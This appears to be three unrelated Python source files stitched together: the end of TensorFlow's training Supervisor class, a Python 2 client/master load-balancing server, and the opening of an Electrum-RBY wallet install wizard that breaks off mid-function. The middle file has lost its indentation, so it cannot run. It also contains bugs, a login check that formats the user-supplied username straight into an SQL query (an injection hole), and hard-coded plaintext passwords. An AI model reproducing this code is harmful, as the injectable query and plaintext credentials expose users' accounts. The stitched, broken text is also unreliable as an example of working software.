  """
  return self._is_chief

@property
def session_manager(self):
  """Return the SessionManager used by the Supervisor.

  Returns:
    A SessionManager object.
  """
  return self._session_manager

@property
def coord(self):
  """Return the Coordinator used by the Supervisor.

  The Coordinator can be useful if you want to run multiple threads
  during your training.

  Returns:
    A Coordinator object.
  """
  return self._coord

@property
def init_op(self):
  """Return the Init Op used by the supervisor.

  Returns:
    An Op or `None`.
  """
  return self._init_op

@property
def init_feed_dict(self):
  """Return the feed dictionary used when evaluating the `init_op`.

  Returns:
    A feed dictionary or `None`.
  """
  return self._init_feed_dict

@property
def ready_op(self):
  """Return the Ready Op used by the supervisor.

  Returns:
    An Op or `None`.
  """
  return self._ready_op
@property
def ready_for_local_init_op(self):
  """Return the op checked before running `local_init_op`, or `None`."""
  return self._ready_for_local_init_op

@property
def summary_writer(self):
  """Return the SummaryWriter used by the chief supervisor.

  Returns:
    A SummaryWriter.
  """
  return self._summary_writer

@property
def summary_op(self):
  """Return the Summary Tensor used by the chief supervisor.

  Returns:
    A string Tensor for the summary or `None`.
  """
  return self._summary_op

@property
def save_summaries_secs(self):
  """Return the delay between summary computations.

  Returns:
    A number of seconds.
  """
  return self._save_summaries_secs

@property
def global_step(self):
  """Return the global_step Tensor used by the supervisor.

  Returns:
    An integer Tensor for the global_step.
  """
  return self._global_step

@property
def saver(self):
  """Return the Saver used by the supervisor.

  Returns:
    A Saver object.
  """
  return self._saver

@property
def save_model_secs(self):
  """Return the delay between checkpoints.

  Returns:
    A number of seconds.
  """
  return self._save_model_secs

@property
def save_path(self):
  """Return the save path used by the supervisor.

  Returns:
    A string.
  """
  return self._save_path
def _write_graph(self):
  """Writes graph_def to `logdir` and adds it to summary if applicable."""
  # Only the chief writes the graph; non-chief supervisors never call this.
  assert self._is_chief
  if self._logdir:
    training_util.write_graph(self._graph.as_graph_def(add_shapes=True),
                              self._logdir, "graph.pbtxt")
  if self._summary_writer and not self._graph_added_to_summary:
    # Record the graph and meta-graph once per writer lifetime; the flag is
    # reset when the writer is closed in stop().
    self._summary_writer.add_graph(self._graph)
    self._summary_writer.add_meta_graph(self._meta_graph_def)
    self._graph_added_to_summary = True
def start_standard_services(self, sess):
  """Start the standard services for 'sess'.

  This starts services in the background. The services started depend
  on the parameters to the constructor and may include:

    - A Summary thread computing summaries every save_summaries_secs.
    - A Checkpoint thread saving the model every save_model_secs.
    - A StepCounter thread measuring step time.

  Args:
    sess: A Session.

  Returns:
    A list of threads that are running the standard services. You can use
    the Supervisor's Coordinator to join these threads with:
      sv.coord.Join(<list of threads>)

  Raises:
    RuntimeError: If called with a non-chief Supervisor.
    ValueError: If no `logdir` was passed to the constructor, as the
      services need a log directory.
  """
  if not self._is_chief:
    raise RuntimeError("Only chief supervisor can start standard services. "
                       "Because only chief supervisors can write events.")

  if not self._logdir:
    logging.warning("Standard services need a 'logdir' "
                    "passed to the SessionManager")
    return

  if self._global_step is not None and self._summary_writer:
    # Only add the session log if we keep track of global step.
    # TensorBoard cannot use START message for purging expired events
    # if there is no step value.
    current_step = training_util.global_step(sess, self._global_step)
    self._summary_writer.add_session_log(
        SessionLog(status=SessionLog.START),
        current_step)

  threads = []
  if self._save_summaries_secs and self._summary_writer:
    if self._summary_op is not None:
      threads.append(SVSummaryThread(self, sess))
    if self._global_step is not None:
      threads.append(SVStepCounterThread(self, sess))
  if self.saver and self._save_model_secs:
    threads.append(SVTimerCheckpointThread(self, sess))
  for t in threads:
    t.start()
  return threads
def prepare_or_wait_for_session(self, master="", config=None,
                                wait_for_checkpoint=False,
                                max_wait_secs=7200,
                                start_standard_services=True):
  """Make sure the model is ready to be used.

  Create a session on 'master', recovering or initializing the model as
  needed, or wait for a session to be ready. If running as the chief
  and `start_standard_service` is set to True, also call the session
  manager to start the standard services.

  Args:
    master: name of the TensorFlow master to use. See the `tf.Session`
      constructor for how this is interpreted.
    config: Optional ConfigProto proto used to configure the session,
      which is passed as-is to create the session.
    wait_for_checkpoint: Whether we should wait for the availability of a
      checkpoint before creating Session. Defaults to False.
    max_wait_secs: Maximum time to wait for the session to become available.
    start_standard_services: Whether to start the standard services and the
      queue runners.

  Returns:
    A Session object that can be used to drive the model.
  """
  # For users who recreate the session with prepare_or_wait_for_session(), we
  # need to clear the coordinator's stop_event so that threads managed by the
  # coordinator can run.
  self._coord.clear_stop()
  if self._summary_writer:
    self._summary_writer.reopen()

  if self._is_chief:
    # Chief: create/restore the model, then write the graph and launch the
    # summary/checkpoint service threads.
    sess = self._session_manager.prepare_session(
        master, init_op=self.init_op, saver=self.saver,
        checkpoint_dir=self._logdir, wait_for_checkpoint=wait_for_checkpoint,
        max_wait_secs=max_wait_secs, config=config,
        init_feed_dict=self._init_feed_dict, init_fn=self._init_fn)
    self._write_graph()
    if start_standard_services:
      logging.info("Starting standard services.")
      self.start_standard_services(sess)
  else:
    # Non-chief: block until the chief has initialized the model.
    sess = self._session_manager.wait_for_session(master,
                                                  config=config,
                                                  max_wait_secs=max_wait_secs)
  if start_standard_services:
    logging.info("Starting queue runners.")
    self.start_queue_runners(sess)
  return sess
def start_queue_runners(self, sess, queue_runners=None):
  """Start threads for `QueueRunners`.

  Note that the queue runners collected in the graph key `QUEUE_RUNNERS`
  are already started automatically when you create a session with the
  supervisor, so unless you have non-collected queue runners to start
  you do not need to call this explicitly.

  Args:
    sess: A `Session`.
    queue_runners: A list of `QueueRunners`. If not specified, we'll use the
      list of queue runners gathered in the graph under the key
      `GraphKeys.QUEUE_RUNNERS`.

  Returns:
    The list of threads started for the `QueueRunners`.

  Raises:
    RuntimeError: If called with eager execution enabled.

  @compatibility(eager)
  Queues are not compatible with eager execution. To ingest data when eager
  execution is enabled, use the `tf.data` API.
  @end_compatibility
  """
  if context.executing_eagerly():
    raise RuntimeError("Queues are not compatible with eager execution.")
  if queue_runners is None:
    queue_runners = self._graph.get_collection(ops.GraphKeys.QUEUE_RUNNERS)
  started = []
  for runner in queue_runners:
    started += runner.create_threads(
        sess, coord=self._coord, daemon=True, start=True)
  return started
def loop(self, timer_interval_secs, target, args=None, kwargs=None):
  """Start a LooperThread that calls a function periodically.

  If `timer_interval_secs` is None the thread calls `target(*args, **kwargs)`
  repeatedly. Otherwise it calls it every `timer_interval_secs`
  seconds. The thread terminates when a stop is requested.

  The started thread is added to the list of threads managed by the
  supervisor so it does not need to be passed to the `stop()` method.

  Args:
    timer_interval_secs: Number. Time boundaries at which to call `target`.
    target: A callable object.
    args: Optional arguments to pass to `target` when calling it.
    kwargs: Optional keyword arguments to pass to `target` when calling it.

  Returns:
    The started thread.
  """
  thread = coordinator.LooperThread(
      self._coord, timer_interval_secs, target=target, args=args,
      kwargs=kwargs)
  thread.start()
  return thread
def stop(self,
         threads=None,
         close_summary_writer=True,
         ignore_live_threads=False):
  """Stop the services and the coordinator.

  This does not close the session.

  Args:
    threads: Optional list of threads to join with the coordinator. If
      `None`, defaults to the threads running the standard services, the
      threads started for `QueueRunners`, and the threads started by the
      `loop()` method. To wait on additional threads, pass the
      list in this parameter.
    close_summary_writer: Whether to close the `summary_writer`. Defaults to
      `True` if the summary writer was created by the supervisor, `False`
      otherwise.
    ignore_live_threads: If `True` ignores threads that remain running after
      a grace period when joining threads via the coordinator, instead of
      raising a RuntimeError.
  """
  self._coord.request_stop()
  try:
    # coord.join() re-raises the first reported exception; the "finally"
    # block ensures that we clean up whether or not an exception was
    # reported.
    self._coord.join(
        threads,
        stop_grace_period_secs=self._stop_grace_secs,
        ignore_live_threads=ignore_live_threads)
  finally:
    # Close the writer last, in case one of the running threads was using it.
    if close_summary_writer and self._summary_writer:
      # Stop messages are not logged with event.step,
      # since the session may have already terminated.
      self._summary_writer.add_session_log(SessionLog(status=SessionLog.STOP))
      self._summary_writer.close()
      # Allow the graph to be re-recorded if the writer is reopened later.
      self._graph_added_to_summary = False
def request_stop(self, ex=None):
  """Request that the coordinator stop the threads.

  See `Coordinator.request_stop()`.

  Args:
    ex: Optional `Exception`, or Python `exc_info` tuple as returned by
      `sys.exc_info()`. If this is the first call to `request_stop()` the
      corresponding exception is recorded and re-raised from `join()`.
  """
  self._coord.request_stop(ex=ex)

def should_stop(self):
  """Check if the coordinator was told to stop.

  See `Coordinator.should_stop()`.

  Returns:
    True if the coordinator was told to stop, False otherwise.
  """
  return self._coord.should_stop()

def stop_on_exception(self):
  """Context handler to stop the supervisor when an exception is raised.

  See `Coordinator.stop_on_exception()`.

  Returns:
    A context handler.
  """
  return self._coord.stop_on_exception()

def wait_for_stop(self):
  """Block waiting for the coordinator to stop."""
  self._coord.wait_for_stop()
def summary_computed(self, sess, summary, global_step=None):
  """Indicate that a summary was computed.

  Args:
    sess: A `Session` object.
    summary: A Summary proto, or a string holding a serialized summary proto.
    global_step: Int. global step this summary is associated with. If `None`,
      it will try to fetch the current step.

  Raises:
    TypeError: if 'summary' is not a Summary proto or a string.
    RuntimeError: if the Supervisor was created without a `logdir`.
  """
  writer = self._summary_writer
  if not writer:
    raise RuntimeError("Writing a summary requires a summary writer.")
  step = global_step
  if step is None and self.global_step is not None:
    # No explicit step given: read the current global step from the session.
    step = training_util.global_step(sess, self.global_step)
  writer.add_summary(summary, step)
def _default_global_step_tensor(self):
  """Returns the global_step from the default graph.

  Returns:
    The global step `Tensor` or `None`.
  """
  try:
    tensor = ops.get_default_graph().get_tensor_by_name("global_step:0")
  except KeyError:
    # No tensor named "global_step" in the graph.
    return None
  if tensor.dtype.base_dtype not in (dtypes.int32, dtypes.int64):
    logging.warning("Found 'global_step' is not an int type: %s",
                    tensor.dtype)
    return None
  return tensor
def _verify_setup(self):
  """Check that all is good.

  Raises:
    ValueError: If something is not good.
  """
  if self._is_chief:
    return
  # Not running as chief means that replicas are used.
  # In that case all Variables must have their device set.
  for op in self._graph.get_operations():
    if op.type in ("Variable", "VariableV2") and not op.device:
      raise ValueError("When using replicas, all Variables must have "
                       "their device set: %s" % op)
# pylint: disable=g-doc-return-or-yield,broad-except
@contextlib.contextmanager
def managed_session(self, master="", config=None,
                    start_standard_services=True,
                    close_summary_writer=True):
  """Returns a context manager for a managed session.

  This context manager creates and automatically recovers a session. It
  optionally starts the standard services that handle checkpoints and
  summaries. It monitors exceptions raised from the `with` block or from the
  services and stops the supervisor as needed.

  The context manager is typically used as follows:

  ```python
  def train():
    sv = tf.train.Supervisor(...)
    with sv.managed_session(<master>) as sess:
      for step in xrange(..):
        if sv.should_stop():
          break
        sess.run(<my training op>)
        ...do other things needed at each training step...
  ```

  An exception raised from the `with` block or one of the service threads is
  raised again when the block exits. This is done after stopping all threads
  and closing the session. For example, an `AbortedError` exception, raised
  in case of preemption of one of the workers in a distributed model, is
  raised again when the block exits.

  If you want to retry the training loop in case of preemption you can do it
  as follows:

  ```python
  def main(...):
    while True:
      try:
        train()
      except tf.errors.Aborted:
        pass
  ```

  As a special case, exceptions used for control flow, such as
  `OutOfRangeError` which reports that input queues are exhausted, are not
  raised again from the `with` block: they indicate a clean termination of
  the training loop and are considered normal termination.

  Args:
    master: name of the TensorFlow master to use. See the `tf.Session`
      constructor for how this is interpreted.
    config: Optional `ConfigProto` proto used to configure the session.
      Passed as-is to create the session.
    start_standard_services: Whether to start the standard services,
      such as checkpoint, summary and step counter.
    close_summary_writer: Whether to close the summary writer when
      closing the session. Defaults to True.

  Returns:
    A context manager that yields a `Session` restored from the latest
    checkpoint or initialized from scratch if no checkpoint exists. The
    session is closed when the `with` block exits.
  """
  try:
    sess = self.prepare_or_wait_for_session(
        master=master, config=config,
        start_standard_services=start_standard_services)
    yield sess
  except Exception as e:
    # Record the exception with the coordinator; stop() below re-raises it
    # after the threads have been joined.
    self.request_stop(e)
  finally:
    try:
      # Request all the threads to stop and wait for them to do so. Any
      # exception raised by the threads is raised again from stop().
      # Passing stop_grace_period_secs is for blocked enqueue/dequeue
      # threads which are not checking for `should_stop()`. They
      # will be stopped when we close the session further down.
      self.stop(close_summary_writer=close_summary_writer)
    finally:
      # Close the session to finish up all pending calls. We do not care
      # about exceptions raised when closing. This takes care of
      # blocked enqueue/dequeue calls.
      try:
        sess.close()
      except Exception:
        # Silently ignore exceptions raised by close().
        pass
# pylint: enable=g-doc-return-or-yield,broad-except
class SVSummaryThread(coordinator.LooperThread):
  """A looper thread that periodically computes and records summaries."""

  def __init__(self, sv, sess):
    """Create a SVSummaryThread.

    Args:
      sv: A `Supervisor`.
      sess: A `Session`.
    """
    super(SVSummaryThread, self).__init__(sv.coord, sv.save_summaries_secs)
    self._sv = sv
    self._sess = sess

  def run_loop(self):
    """Run one summary step: fetch the summary (and step) and record it."""
    sv = self._sv
    if sv.global_step is not None:
      # Fetch the summary and the current step in a single run call.
      summary_strs, global_step = self._sess.run(
          [sv.summary_op, sv.global_step])
    else:
      global_step = None
      summary_strs = self._sess.run(sv.summary_op)
    if sv.summary_writer:
      logging.info("Recording summary at step %s.", global_step)
      sv.summary_writer.add_summary(summary_strs, global_step)
class SVStepCounterThread(coordinator.LooperThread):
  """Threads to count steps and measure their duration."""

  def __init__(self, sv, sess, step_counter=None):
    """Create a `SVStepCounterThread`.

    Args:
      sv: A `Supervisor`.
      sess: A `Session`.
      step_counter: A `Tensor` holding the step counter. By defaults, it uses
        sv.global_step.
    """
    super(SVStepCounterThread, self).__init__(sv.coord,
                                              sv.save_summaries_secs)
    self._sv = sv
    self._sess = sess
    self._last_time = 0.0
    self._last_step = 0
    self._step_counter = (sv.global_step if step_counter is None
                          else step_counter)
    self._summary_tag = "%s/sec" % self._step_counter.op.name

  def start_loop(self):
    """Snapshot the wall clock and step counter before the first loop."""
    self._last_time = time.time()
    self._last_step = training_util.global_step(self._sess,
                                                self._step_counter)

  def run_loop(self):
    """Compute steps/sec since the last call and record it as a summary."""
    current_step = training_util.global_step(self._sess, self._step_counter)
    added_steps = current_step - self._last_step
    self._last_step = current_step
    now = time.time()
    elapsed_time = now - self._last_time
    self._last_time = now
    # Report steps done per second; guard against a zero-length interval.
    if elapsed_time > 0.:
      steps_per_sec = added_steps / elapsed_time
    else:
      steps_per_sec = float("inf")
    summary = Summary(value=[Summary.Value(tag=self._summary_tag,
                                           simple_value=steps_per_sec)])
    if self._sv.summary_writer:
      self._sv.summary_writer.add_summary(summary, current_step)
    logging.log_first_n(logging.INFO, "%s: %g", 10,
                        self._summary_tag, steps_per_sec)
class SVTimerCheckpointThread(coordinator.LooperThread):
  """A looper thread that saves a checkpoint on a timer."""

  def __init__(self, sv, sess):
    """Create a `SVTimerCheckpointThread`.

    Args:
      sv: A `Supervisor`.
      sess: A `Session`.
    """
    super(SVTimerCheckpointThread, self).__init__(sv.coord,
                                                  sv.save_model_secs)
    self._sv = sv
    self._sess = sess

  def run_loop(self):
    """Save one checkpoint and log a CHECKPOINT session event."""
    sv = self._sv
    logging.info("Saving checkpoint to path %s", sv.save_path)
    sv.saver.save(self._sess, sv.save_path, global_step=sv.global_step)
    if sv.summary_writer and sv.global_step is not None:
      current_step = training_util.global_step(self._sess, sv.global_step)
      sv.summary_writer.add_session_log(
          SessionLog(status=SessionLog.CHECKPOINT,
                     checkpoint_path=sv.save_path),
          current_step)
# TODO(sherrym): All non-PEP8 compliant names will be deprecated shortly.
# CamelCase aliases kept for backwards compatibility with older callers.
setattr(Supervisor, "PrepareSession", Supervisor.prepare_or_wait_for_session)
setattr(Supervisor, "StartQueueRunners", Supervisor.start_queue_runners)
setattr(Supervisor, "StartStandardServices", Supervisor.start_standard_services)
setattr(Supervisor, "Stop", Supervisor.stop)
setattr(Supervisor, "RequestStop", Supervisor.request_stop)
setattr(Supervisor, "Loop", Supervisor.loop)
setattr(Supervisor, "ShouldStop", Supervisor.should_stop)
setattr(Supervisor, "StopOnException", Supervisor.stop_on_exception)
setattr(Supervisor, "WaitForStop", Supervisor.wait_for_stop)
setattr(Supervisor, "SummaryComputed", Supervisor.summary_computed)
|
Monitor_server.py | import sys
import socket
import sqlite3
import select
import sys
import threading
import thread
from threading import Thread, Lock
from multiprocessing.pool import ThreadPool
import json
# Number of master servers participating in round-robin dispatch.
number_of_masters = 2
# Master name -> "host:port" endpoint of each known master.
masters = dict()
# Username -> connected client socket, used by receiveStatus() to route
# results back to the right client.
clients = dict()
# Per-master overload flag ('Yes' = at capacity; getMaster() skips it).
threshold = {'Master1':'No','Master2':'No'}
# Round-robin cursor used by getMaster().
i = 0
# UDP port on which receiveStatus() listens for master replies.
receivestatus_port = 10008
def thresholdListen():
'''listen for threshold from the masters and update threshold dictionary.this will be used will redirecting requests to master.'''
print 'Threshold daemon running'
portNumber = 10007
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
host = socket.gethostname()
sock.bind((host, portNumber))
while True:
request, addr = sock.recvfrom(1024)
master,val = request.split(" ")
threshold[master]= val
def informslaves(data):
    '''Broadcast a newly registered master to every slave in config/slave.txt.

    Args:
      data: "MasterN=host:port" line describing the new master.
    '''
    req = {"request": "New", "data": data}
    with open("config/slave.txt", 'r') as fin:
        for line in fin:
            host, port = line.strip().split("=")[1].split(",")[0].split(":")
            sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            # Bug fix: the request envelope `req` was built but never used;
            # the raw `data` string was sent instead of the JSON envelope.
            sock.sendto(json.dumps(req), (host, int(port)))
            sock.close()
def receiveStatus():
'''get the status for processed request from master and send it back to client'''
global masters
print 'Listening for status on port ' + str(receivestatus_port)
portNumber = receivestatus_port
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
host = socket.gethostname()
sock.bind((host, portNumber))
while True:
status, addr = sock.recvfrom(1024)
returnobj=json.loads(status)
if returnobj['result'] == "shutdown":
masters = {k:v for k,v in masters.items if v.split(":")[0] != addr[0]}
elif returnobj['result'] == "New":
data = "Master{}={}:{}".format(len(masters)+1,addr[0],returnobj['port'])
with open("config/masters.txt",'a') as myfile:
myfile.write("{}\n".format(data))
with open("config/slave.txt",'r') as fin:
slaves = ""
for line in fin:
slaves = slaves + line
sock.sendto(slaves,(addr[0],int(returnobj['port'])))
informslaves(data)
masters["Master{}".format(len(masters)+1)] = "{}:{}".format(addr[0],returnobj['port'])
else:
clients[returnobj['userid']].send(str(returnobj['result']))
class Server:
''' Accept requests from clients and redirect them to masters in round robin pattern'''
def __init__(self):
self.host = ''
self.port = 13464
self.backlog = 5
self.size = 1024
self.server = None
self.pool = ThreadPool(10)
with open("config/masters.txt") as myfile:
for line in myfile:
name, endpoint = line.partition("=")[::2]
masters[name] = endpoint
#name = "Master1"
#endpoint = "localhost:10003"
def open_socket(self):
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server.bind((self.host,self.port))
self.server.listen(5)
def run(self):
self.open_socket()
input = [self.server,]
running = 1
#start a daemon thread to listen threshold
thread = Thread(target = thresholdListen, args = ())
thread.start()
#start a thread to listen results of req from masters
resultThread = Thread(target = receiveStatus, args = ())
resultThread.start()
while running:
inputready,outputready,exceptready = select.select(input,[],[])
for s in inputready:
if s == self.server:
client,address = self.server.accept()
#Assign one thread to handle each client.
self.pool.apply_async(run, args=(client,address))
else:
junk = sys.stdin.readline()
running = 0
self.server.close()
def getMaster():
'''This method will return the next master to which the request should be redirected.'''
global i
i=((i)%(number_of_masters))+1
while True:
if threshold['Master'+str(i)] == 'Yes':
i=((i)%(number_of_masters))+1
else:
break
return 'Master'+str(i)
def run(client,address):
'''This method will be run in seperate thread to process client requests.'''
size = 1024
running = 1
attempts = 0
flag = 0
while running:
while(attempts < 3 and flag == 0):
attempts = attempts + 1
data = json.loads(client.recv(size))
if data:
clients[data['username']]=client
conn_2 = sqlite3.connect('authentication_info.db')
c_2 = conn_2.cursor()
password = ""
for row in c_2.execute("SELECT password from user_info where username = '%s'" % data['username']):
password = row
conn_2.close()
if not password:
client.send('Login failed')
elif data['password'] != password[0]:
client.send('Login failed')
else:
print 'Login Successful\n'
client.send('Thank you for connecting')
flag = 1
break
request_key_value_pair = json.loads(client.recv(size))
if (request_key_value_pair['request']=="Logout"):
print "closing connection"
client.close()
running = 0
flag = 0
print 'Request is ' + str(request_key_value_pair)
master_node = getMaster()
print master_node+'is serving the request'
host,port = masters[master_node].partition(":")[::2]
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
print host,port
sock.sendto(json.dumps(request_key_value_pair), (host,int(port)))
sock.close()
#client.send("successfully received input data and request")
if __name__ == "__main__":
conn = sqlite3.connect('authentication_info.db')
c = conn.cursor()
#c.execute('''DROP TABLE user_info''')
c.execute("CREATE TABLE user_info (username text, password text)")
c.execute("INSERT INTO user_info values('shashank','goud')")
c.execute("INSERT INTO user_info values('ankit','bhandari')")
c.execute("INSERT INTO user_info values('kaustubh','sant')")
c.execute("INSERT INTO user_info values('nikhil','chintapallee')")
conn.commit()
conn.close()
s = Server()
s.run()
|
installwizard.py |
import sys
import os
from PyQt5.QtGui import *
from PyQt5.QtCore import *
import PyQt5.QtCore as QtCore
import electrum_rby as electrum
from electrum_rby import Wallet, WalletStorage
from electrum_rby.util import UserCancelled, InvalidPassword
from electrum_rby.base_wizard import BaseWizard
from electrum_rby.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import *
from .password_dialog import PasswordLayout, PW_NEW
class GoBack(Exception):
pass
MSG_GENERATING_WAIT = _("Electrum is generating your addresses, please wait...")
MSG_ENTER_ANYTHING = _("Please enter a seed phrase, a master key, a list of "
"Rubycoin addresses, or a list of private keys")
MSG_ENTER_SEED_OR_MPK = _("Please enter a seed phrase or a master key (xpub or xprv):")
MSG_COSIGNER = _("Please enter the master public key of cosigner #%d:")
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_RESTORE_PASSPHRASE = \
_("Please enter your seed derivation passphrase. "
"Note: this is NOT your encryption password. "
"Leave this field empty if you did not use one or are unsure.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
import math
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, QtCore.Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0]
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
except GoBack:
wizard.go_back() if wizard.can_go_back() else wizard.close()
return
except UserCancelled:
return
#if out is None:
# out = ()
if type(out) is not tuple:
out = (out,)
run_next(*out)
return func_wrapper
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
synchronized_signal = pyqtSignal(str)
def __init__(self, config, app, plugins, storage):
BaseWizard.__init__(self, config, storage)
QDialog.__init__(self, None)
self.setWindowTitle('Electrum-RBY - ' + _('Install Wizard'))
self.app = app
self.config = config
# Set for base base class
self.plugins = plugins
self.language_for_seed = config.get('language')
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon(':icons/electrum-rby.png')
self.show()
self.raise_()
self.refresh_gui() # Need for QT on MacOSX. Lame.
def run_and_get_wallet(self):
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(150)
self.pw_e.setEchoMode(2)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
self.set_layout(vbox, title=_('Electrum-RBY wallet'))
wallet_folder = os.path.dirname(self.storage.path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
path = os.path.join(wallet_folder, filename)
try:
self.storage = WalletStorage(path, manual_upgrades=True)
except IOError:
self.storage = None
if self.storage:
if not self.storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
pw = False
elif self.storage.file_exists() and self.storage.is_encrypted():
msg = _("This file is encrypted.") + '\n' + _('Enter your password or choose another file.')
pw = True
else:
msg = _("Press 'Next' to open this wallet.")
pw = False
else:
msg = _('Cannot read file')
pw = False
self.msg_label.setText(msg)
if pw:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.storage.path)
self.name_e.setText(n)
while True:
if self.storage.file_exists() and not self.storage.is_encrypted():
break
if self.loop.exec_() != 2: # 2 = next
return
if not self.storage.file_exists():
break
if self.storage.file_exists() and self.storage.is_encrypted():
password = self.pw_e.text()
try:
self.storage.decrypt(password)
break
except InvalidPassword as e:
QMessageBox.information(None, _('Error'), str(e))
continue
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
return
path = self.storage.path
if self.storage.requires_split():
self.hide()
msg = _("The wallet '%s' contains multiple accounts, which are no longer supported in Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?"%path)
if not self.question(msg):
return
file_list = '\n'.join(self.storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
return
if self.storage.requires_upgrade():
self.hide()
msg = _("The format of your wallet '%s' must be upgraded for Electrum. This change will not be backward compatible"%path)
if not self.question(msg):
return
self.storage.upgrade()
self.show_warning(_('Your wallet was upgraded successfully'))
self.wallet = Wallet(self.storage)
return self.wallet
action = self.storage.get_action()
if action and action != 'new':
self.hide()
msg = _("The file '%s' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?") % path
if not self.question(msg):
if self.question(_("Do you want to delete '%s'?") % path):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
if action:
# self.wallet is set in run
self.run(action)
return self.wallet
self.wallet = Wallet(self.storage)
return self.wallet
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(filename).scaledToWidth(60))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid):
slayout = KeysLayout(parent=self, title=message, is_valid=is_valid)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
